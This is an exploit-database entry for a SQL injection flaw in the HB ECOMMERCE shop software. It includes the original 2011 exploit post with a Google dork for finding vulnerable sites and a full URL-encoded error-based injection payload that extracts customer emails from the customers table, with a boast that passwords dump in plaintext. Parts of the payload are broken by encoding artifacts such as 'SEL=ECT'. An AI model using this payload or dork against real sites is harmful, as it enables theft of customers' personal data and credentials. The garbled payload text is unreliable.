HB ECOMMERCE SQL Injection Vulnerability

vendor:

HB ECOMMERCE

by:

takeshix

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: HB ECOMMERCE

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Debian GNU/Linux Testing(Wheezy) x64

2011

HB ECOMMERCE SQL Injection Vulnerability

HB ECOMMERCE is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the customers table and dump passwords in plaintext. The vulnerable URL is /templates1/view_product.php?product=, where the attacker can inject malicious SQL code. An example of a malicious URL is http://localhost/templates1/view_product.php?product=94746%20AND%20%28SEL=ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%=2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%20LIMIT%205%2C1%29%2CCHAR%2858%2C109%2C103%2C100%2C58%29%2CFLOOR%28RAND%280%29%2A2%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%2 9a%29%20

Mitigation:

Input validation and sanitization should be used to prevent SQL injection attacks. Additionally, access to the database should be restricted to only necessary users and roles.

Source

Exploit-DB raw data:

-------------[ HB ECOMMERCE SQL Injection Vulnerability ]---------------
------------------------------------------------------------------------
------------------------------------------------------------------------
[+] Exploit Title: [ HB ECOMMERCE SQL Injection Vulnerability ]
[+] Google Dork: intext:'supplied by hb ecommerce'
[+] Date: 26.05.2011
[+] Author: takeshix
[+] Author Contact: takeshix@safe-mail.net
[+] Software Link: http://www.hbecommerce.co.uk/
[+] Tested on: Debian GNU/Linux Testing(Wheezy) x64
[+] System: PHP
------------------------------------------------------------------------
------------------------------------------------------------------------
vulnerable url:

/templates1/view_product.php?product=

Example:

http://localhost/templates1/view_product.php?product=[SQL INJECTION]

Get an Mail from the Customers Table:

http://localhost/templates1/view_product.php?product=94746%20AND%20%28SEL=
ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%=
2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2=
CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2=
0LIMIT%205%2C1%29%2CCHAR%2858%2C109%2C103%2C100%2C58%29%2CFLOOR%28RAND%280%=
29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%2=
9a%29%20

note: customer passwords dumped in plaintext!

------------------------------------------------------------------------
------------------------------------------------------------------------
Greez to: esc0bar | Someone | takedown
------------------------------------------------------------------------
------------------------------------------------------------------------
--------------------------[ hacktivistas ]------------------------------